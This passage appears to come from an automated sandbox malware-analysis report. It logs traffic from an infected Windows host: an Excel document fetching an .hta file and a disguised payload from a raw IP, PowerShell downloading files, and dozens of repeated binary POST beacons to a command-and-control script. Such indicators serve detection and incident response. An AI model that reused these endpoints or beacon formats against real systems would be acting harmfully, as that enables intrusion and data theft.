                Source: global trafficHTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Fri, 25 Oct 2024 04:20:14 GMTConnection: Keep-AliveHost: 192.3.176.141If-None-Match: "33147-625456f86fad3"
                Source: global trafficHTTP traffic detected: GET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49173 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.22:49174 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89A04B18 URLDownloadToFileW,5_2_000007FE89A04B18
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D35A1E0C.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.176.141If-Range: "33147-625456f86fad3"
                Source: global trafficHTTP traffic detected: GET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Fri, 25 Oct 2024 04:20:14 GMTConnection: Keep-AliveHost: 192.3.176.141If-None-Match: "33147-625456f86fad3"
                Source: global trafficHTTP traffic detected: GET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /41/SMPLRTT.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: qrisni.me
                Source: global trafficDNS traffic detected: DNS query: drive.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:51:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
